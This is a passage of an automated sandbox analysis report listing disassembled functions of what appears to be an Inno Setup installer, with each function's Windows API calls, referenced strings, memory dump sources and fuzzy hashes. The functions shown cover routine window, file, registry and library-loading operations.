                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                              • API String ID: 3850602802-3720027226
                                                              • Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                              • Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
                                                              • Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                              • Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
                                                              Function 004786EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowkeyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                              • GetFocus.USER32 ref: 00478757
                                                              • GetKeyState.USER32(0000007A), ref: 00478769
                                                              • WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FocusMessageStateTextWaitWindow
                                                              • String ID: Wnd=$%x
                                                              • API String ID: 1381870634-2927251529
                                                              • Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                              • Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
                                                              • Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                              • Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
                                                              Function 0046E610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Time$File$LocalSystem
                                                              • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                              • API String ID: 1748579591-1013271723
                                                              • Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                              • Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
                                                              • Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                              • Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
                                                              Function 00453F76 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesDeleteErrorLastMove
                                                              • String ID: DeleteFile$MoveFile
                                                              • API String ID: 3024442154-139070271
                                                              • Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                              • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                              • Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                              • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                              Function 00459364 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                              • API String ID: 47109696-2631785700
                                                              • Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                              • Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
                                                              • Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                              • Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
                                                              Function 00483BC4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
                                                              • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
                                                              Strings
                                                              • System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
                                                              • CSDVersion, xrefs: 00483BFC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                              • API String ID: 3677997916-1910633163
                                                              • Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                              • Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
                                                              • Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                              • Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                              Function 0042D8F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                              • API String ID: 1646373207-4063490227
                                                              • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                              • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                              • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                              • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                              Function 0042EB54 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                              • API String ID: 1646373207-260599015
                                                              • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                              • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                              • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                              • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                              Function 0044F744 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: NotifyWinEvent$user32.dll
                                                              • API String ID: 1646373207-597752486
                                                              • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                              • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                              • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                              • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                              Function 00498968 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: DisableProcessWindowsGhosting$user32.dll
                                                              • API String ID: 1646373207-834958232
                                                              • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                              • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                              • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                              • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                              Function 004645F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                              • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                              • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: SHPathPrepareForWriteA$shell32.dll
                                                              • API String ID: 2238633743-2683653824
                                                              • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                              • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                              • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                              • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                              Function 0047D67C Relevance: 6.2, APIs: 4, Instructions: 195fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                              • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileNext
                                                              • String ID:
                                                              • API String ID: 2066263336-0
                                                              • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                              • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                              • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                              • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                              Function 004755AC Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                              • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CountErrorFileLastMoveTick
                                                              • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                              • API String ID: 2406187244-2685451598
                                                              • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                              • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                              • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                              • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                              Function 00413CF8 Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDesktopWindow.USER32 ref: 00413D46
                                                              • GetDesktopWindow.USER32 ref: 00413DFE
                                                                • Part of subcall function 00418EC0: 6F5AC6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                              • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CursorDesktopWindow$Show
                                                              • String ID:
                                                              • API String ID: 2074268717-0
                                                              • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                              • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                              • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                              • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                              Function 00408A54 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                              • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                              • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: LoadString$FileMessageModuleName
                                                              • String ID:
                                                              • API String ID: 704749118-0
